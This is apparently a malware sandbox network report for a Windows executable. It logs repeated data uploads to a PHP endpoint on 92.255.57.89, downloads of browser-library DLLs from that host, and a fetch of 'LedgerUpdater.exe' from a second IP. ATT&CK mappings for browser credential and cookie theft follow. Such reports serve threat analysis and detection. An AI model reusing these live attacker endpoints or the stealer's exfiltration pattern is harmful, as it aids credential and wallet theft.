POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH
Host: 92.255.57.89
Content-Length: 4751
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:25 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://92.255.57.89/697b92cb4e247842/sqlite3.dll

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET /697b92cb4e247842/sqlite3.dll HTTP/1.1
Host: 92.255.57.89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:25 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
DNS

89.57.255.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.57.255.92.in-addr.arpa

IN PTR

Response
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.20.164
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

172.217.20.164:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 429

date: Thu, 12 Dec 2024 06:15:27 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate
content-type: text/html
server: HTTP server (unknown)
content-length: 3153
content-type: text/html
content-length: 3153
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

172.217.20.164:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CNeCywE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

172.217.20.164:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGP_-6boGIjDzx0UgPd1Ye9hH-SCuu8Yi1wMJ-5KQAULREY-m-Pxlw5CrqUMiac7UoG4-pzFSPRAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

172.217.20.164:443

Request

GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGP_-6boGIjDzx0UgPd1Ye9hH-SCuu8Yi1wMJ-5KQAULREY-m-Pxlw5CrqUMiac7UoG4-pzFSPRAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

67.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.179.250.142.in-addr.arpa

IN PTR

Response

67.179.250.142.in-addr.arpa

IN PTR

par21s19-in-f31e100net
DNS

138.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.178.250.142.in-addr.arpa

IN PTR

Response

138.178.250.142.in-addr.arpa

IN PTR

par21s22-in-f101e100net
DNS

164.20.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

164.20.217.172.in-addr.arpa

IN PTR

Response

164.20.217.172.in-addr.arpa

IN PTR

waw02s07-in-f41e100net

164.20.217.172.in-addr.arpa

IN PTR

waw02s07-in-f164�H

164.20.217.172.in-addr.arpa

IN PTR

par10s49-in-f4�H
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

172.217.20.206
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D65%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D65%2526e%253D1

chrome.exe

Remote address:

172.217.20.206:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D65%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D65%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=EXX8HwltMz0U_PgAZRpbUmVhnYmJOfq9vCiuc6ZowQGt5tcs6jjMsxc1L16ZywYwMc5Aw-GeRhdrQPNTUngHXZ3puR6OWM6SX_Qp4gE4aKeqVeYQbUAsxhECS5dfLVqmcoc3bmkwx_Z610ohJy8_ENbZ53TLdJVsGZFdOygYR8-VJXVuBOoYbftoqkvo74BXATo
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.179.97
GET

https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx

chrome.exe

Remote address:

142.250.179.97:443

Request

GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/2.0
host: clients2.googleusercontent.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

206.20.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.20.217.172.in-addr.arpa

IN PTR

Response

206.20.217.172.in-addr.arpa

IN PTR

waw02s08-in-f2061e100net

206.20.217.172.in-addr.arpa

IN PTR

par10s50-in-f14�J

206.20.217.172.in-addr.arpa

IN PTR

waw02s08-in-f14�J
DNS

97.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.179.250.142.in-addr.arpa

IN PTR

Response

97.179.250.142.in-addr.arpa

IN PTR

par21s20-in-f11e100net
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEB
Host: 92.255.57.89
Content-Length: 1019
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:33 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB
Host: 92.255.57.89
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:33 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

140.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.32.126.40.in-addr.arpa

IN PTR

Response
DNS

54.242.123.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.242.123.52.in-addr.arpa

IN PTR

Response
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEG
Host: 92.255.57.89
Content-Length: 431
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:38 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJEC
Host: 92.255.57.89
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:38 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://92.255.57.89/697b92cb4e247842/freebl3.dll

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET /697b92cb4e247842/freebl3.dll HTTP/1.1
Host: 92.255.57.89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:38 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://92.255.57.89/697b92cb4e247842/mozglue.dll

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET /697b92cb4e247842/mozglue.dll HTTP/1.1
Host: 92.255.57.89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:39 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://92.255.57.89/697b92cb4e247842/msvcp140.dll

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET /697b92cb4e247842/msvcp140.dll HTTP/1.1
Host: 92.255.57.89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:40 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://92.255.57.89/697b92cb4e247842/nss3.dll

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET /697b92cb4e247842/nss3.dll HTTP/1.1
Host: 92.255.57.89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:40 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://92.255.57.89/697b92cb4e247842/softokn3.dll

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET /697b92cb4e247842/softokn3.dll HTTP/1.1
Host: 92.255.57.89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:41 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
GET

http://92.255.57.89/697b92cb4e247842/vcruntime140.dll

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET /697b92cb4e247842/vcruntime140.dll HTTP/1.1
Host: 92.255.57.89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:42 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
Host: 92.255.57.89
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:42 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF
Host: 92.255.57.89
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:42 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCGCGDHJEGHJKFHJJJKJ
Host: 92.255.57.89
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:42 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 72
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJD
Host: 92.255.57.89
Content-Length: 118051
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:43 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHD
Host: 92.255.57.89
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:43 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 416
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://176.113.115.215/LedgerUpdater.exe

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

176.113.115.215:80

Request

GET /LedgerUpdater.exe HTTP/1.1
Host: 176.113.115.215
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 01 Nov 2024 13:21:33 GMT
ETag: "1aa00-625d9d04b7140"
Accept-Ranges: bytes
Content-Length: 109056
Content-Type: application/x-msdos-program
DNS

215.115.113.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.115.113.176.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom

92.255.57.89:80

http://92.255.57.89/697b92cb4e247842/sqlite3.dll

http

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

48.1kB
1.2MB
844
835

HTTP Request

GET http://92.255.57.89/

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

GET http://92.255.57.89/697b92cb4e247842/sqlite3.dll

HTTP Response

200
172.217.20.164:443

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGP_-6boGIjDzx0UgPd1Ye9hH-SCuu8Yi1wMJ-5KQAULREY-m-Pxlw5CrqUMiac7UoG4-pzFSPRAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

tls, http2

chrome.exe

2.7kB
13.5kB
26
30

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGP_-6boGIjDzx0UgPd1Ye9hH-SCuu8Yi1wMJ-5KQAULREY-m-Pxlw5CrqUMiac7UoG4-pzFSPRAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

HTTP Response

429
172.217.20.206:443

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D65%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D65%2526e%253D1

tls, http2

chrome.exe

2.1kB
9.6kB
15
15

HTTP Request

GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D65%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D65%2526e%253D1
142.250.179.97:443

https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx

tls, http2

chrome.exe

4.5kB
156.2kB
73
117

HTTP Request

GET https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx
92.255.57.89:80

http://92.255.57.89/45c616e921a794b8.php

http

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

2.2kB
697 B
9
7

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200
127.0.0.1:9229

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
127.0.0.1:9229

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
127.0.0.1:9229

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
127.0.0.1:9229

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
92.255.57.89:80

http://92.255.57.89/45c616e921a794b8.php

http

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

270.3kB
4.3MB
3159
3082

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

GET http://92.255.57.89/697b92cb4e247842/freebl3.dll

HTTP Response

200

HTTP Request

GET http://92.255.57.89/697b92cb4e247842/mozglue.dll

HTTP Response

200

HTTP Request

GET http://92.255.57.89/697b92cb4e247842/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://92.255.57.89/697b92cb4e247842/nss3.dll

HTTP Response

200

HTTP Request

GET http://92.255.57.89/697b92cb4e247842/softokn3.dll

HTTP Response

200

HTTP Request

GET http://92.255.57.89/697b92cb4e247842/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200

HTTP Request

POST http://92.255.57.89/45c616e921a794b8.php

HTTP Response

200
176.113.115.215:80

http://176.113.115.215/LedgerUpdater.exe

http

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

4.0kB
112.6kB
85
83

HTTP Request

GET http://176.113.115.215/LedgerUpdater.exe

HTTP Response

200

8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

89.57.255.92.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

89.57.255.92.in-addr.arpa
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

172.217.20.164
172.217.20.164:443

www.google.com

https

chrome.exe

4.1kB
14.2kB
15
18
8.8.8.8:53

67.179.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

67.179.250.142.in-addr.arpa
8.8.8.8:53

138.178.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

138.178.250.142.in-addr.arpa
8.8.8.8:53

164.20.217.172.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

164.20.217.172.in-addr.arpa
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
105 B
1
1

DNS Request

clients2.google.com

DNS Response

172.217.20.206
224.0.0.251:5353

chrome.exe

204 B
3
8.8.8.8:53

clients2.googleusercontent.com

dns

chrome.exe

76 B
121 B
1
1

DNS Request

clients2.googleusercontent.com

DNS Response

142.250.179.97
8.8.8.8:53

206.20.217.172.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

206.20.217.172.in-addr.arpa
8.8.8.8:53

97.179.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

97.179.250.142.in-addr.arpa
8.8.8.8:53

140.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

140.32.126.40.in-addr.arpa
8.8.8.8:53

54.242.123.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

54.242.123.52.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

215.115.113.176.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

215.115.113.176.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

Privilege Escalation

Defense Evasion

Modify Authentication Process

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

Remote System Discovery

T1018

System Information Discovery